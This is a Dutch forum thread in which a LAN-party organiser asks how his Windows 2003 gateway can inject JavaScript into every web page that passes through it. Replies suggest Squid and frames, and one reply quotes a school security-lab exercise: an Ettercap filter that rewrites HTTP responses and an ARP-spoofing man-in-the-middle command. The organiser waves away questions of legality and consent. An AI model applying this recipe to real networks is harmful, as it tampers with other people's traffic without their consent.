Win2003 'router' moet stuk javascr bij html pagina's toevoeg

Pagina: 1
Acties:

  • geerttttt
  • Registratie: Oktober 2006
  • Laatst online: 27-01 12:49

geerttttt

Manisch positief

Topicstarter
Lange titel, maar goed.

Ik heb een windows 2003 server welke het internet gaat routeren op een lan-party. Dit werkt allemaal prima, maar ik zat met een heel mooi ondanks waarsch. lastig idee.

Ik zou het mooi vinden om een stuk javascript in elke html pagina die door de win2003 server gerouteerd wordt te plaatsen. Hierdoor kan ik o.a. in elke site een kleine balk met informatie over de lan plaatsen. :)

Dit zou in principe (ookal is het niet netjes) voor de <html> begin van een pagina kunnen lijkt me. Dus zou hij dan een stuk javascript van mij kunnen samenvoegen met de originele pagina.

Nu mijn vraag, hoe kan ik dat doen. Ik heb eigenlijk geen idee hoe ik zoiets kan realiseren. Zijn er missch. proxy's die dat kunnen, en zo ja, kan ik die proxy ook weer koppelen aan die windows 2003 server zodat al het verkeer daar doorheen gaat?

Iemand die wat kan helpen of een idee heeft, graag ;)

Oost west, 127.0.0.1 best!


  • LuckY
  • Registratie: December 2007
  • Niet online
Ik heb me een klein beetje verdiept in ARP spoofing op een ubuntu bak.
Daar was het mogelijk met ethercap/wireshark met templates HTML tags toe te voegen of te bewerken.
Aangezien je niet hoeft te ARP spoofen omdat je de gateway bent kan je misschien wel kijken of je het verkeer kan manipuleren.
Maar pas op waar je mee bezig bent want ik weet niet of dit legaal is.
Je kan der in iedergeval Imagetags mee bewerken.
Maar is het niet gewoon handiger als je een intranet page maakt.
Mensen vinden het denk ik niet fijn als hun sites worden bewerkt.
desnoods maak je een gateway pagina aan waarin ze moeten navigeren
dmv 2 frames oid bovenste is browsen en onderste in informatie.
Dan weet je zeker dat je niet illegaal bezig ben.

  • elevator
  • Registratie: December 2001
  • Niet online

elevator

Officieel moto fan :)

Ik denk dat Squid dat wel kan: http://wiki.squid-cache.org/SquidFaq/ContentAdaptation is een wiki pagina van Squid erover. Hoe stabiel Squid op Windows is tegenwoordig weet ik niet, maar je zou desnoods een FreeBSD of Linux machine kunnen draaien als een VMware Server guest ofzo? :)

Verwijderd

Dit kan doormiddel van Ettercap

Stukje uit schoolpracticum netwerk securety:

Veranderen van data: website “defacing”
Het volgende voorbeeld demonstreert de “defacing” van een website.
· Voer op de MITM met een editor de file hhs.filter in:
if (ip.proto == TCP && tcp.src == 80) {
replace(" hogeschool", " kleuterschool");
replace(" Hogeschool", " Kleuterschool");
msg("Filter Match! \n");
}
(Let op de spatie tussen de eerste quote en hogeschool/kleutelschool)
· Compileer het filter en start Ettercap:
etterfilter hhs.filter –o hhs.ef
ettercap –TqF hhs.ef -M arp:remote /10.0.0.x,y/ /10.0.0.1/
Toelichting
- remote onderschept verkeer dat door de gateway gaat
- 10.0.0.x,y zijn de adressen van de beide clients
· Bezoek www.hhs.nl vanaf een browser op één van de clients en bekijk goed de site.
· Stop Ettercap en sluit de browsers

en dan: <html> laten vervangen door jou gedeelte ;)

dit heet een Man In The Middle attack

  • LuckY
  • Registratie: December 2007
  • Niet online
Verwijderd schreef op vrijdag 13 februari 2009 @ 09:58:
Dit kan doormiddel van Ettercap

Stukje uit schoolpracticum netwerk securety:

Veranderen van data: website “defacing”
Het volgende voorbeeld demonstreert de “defacing” van een website.
· Voer op de MITM met een editor de file hhs.filter in:
if (ip.proto == TCP && tcp.src == 80) {
replace(" hogeschool", " kleuterschool");
replace(" Hogeschool", " Kleuterschool");
msg("Filter Match! \n");
}
(Let op de spatie tussen de eerste quote en hogeschool/kleutelschool)
· Compileer het filter en start Ettercap:
etterfilter hhs.filter –o hhs.ef
ettercap –TqF hhs.ef -M arp:remote /10.0.0.x,y/ /10.0.0.1/
Toelichting
- remote onderschept verkeer dat door de gateway gaat
- 10.0.0.x,y zijn de adressen van de beide clients
· Bezoek www.hhs.nl vanaf een browser op één van de clients en bekijk goed de site.
· Stop Ettercap en sluit de browsers

en dan: <html> laten vervangen door jou gedeelte ;)

dit heet een Man In The Middle attack
Niet helemaal waar ;)
Anders zien ze clients niks meer.
Gewoon de pagina in frames verdelen.
Dan geef je je bezoekers namelijk nog de mogelijkheid om het frame naar onder te slepen.

  • geerttttt
  • Registratie: Oktober 2006
  • Laatst online: 27-01 12:49

geerttttt

Manisch positief

Topicstarter
LuckyY schreef op zaterdag 14 februari 2009 @ 11:39:
[...]

Niet helemaal waar ;)
Anders zien ze clients niks meer.
Gewoon de pagina in frames verdelen.
Dan geef je je bezoekers namelijk nog de mogelijkheid om het frame naar onder te slepen.
Frames, tja dat zou nog kunnen. maar een margin op de onderkant van de html pagina, en dan een overlay div die licht transparant is en maar 50px hoog is die een balk vormt onderaan de pagina en meescrolt met de browser lijkt me mooier ;)

Anyhow, legaal... Lijkt me niet relevant, het is op een lan-party. Wij bieden hun het internet aan als extra, dus ze hebben niks te klagen lijkt me ;)

Het is bovendien bedoeld om extra informatie tijdens de lan te kunnen geven aan de deelnemers :)

Maar bedankt voor ettercap, met dat script van je ga ik is even stoeien en hoop ik dat ik wat eruit kan persen... Als iemand nog meer tips heeft, graag ;)

Edit: Ohja, wat diegene die jij weer quote bedoelt is dat je <html> vervangt door <html><script> e.d.
Maar in dat geval kun je beter de <head> tag vervangen.

[ Voor 7% gewijzigd door geerttttt op 15-02-2009 16:31 ]

Oost west, 127.0.0.1 best!

Pagina: 1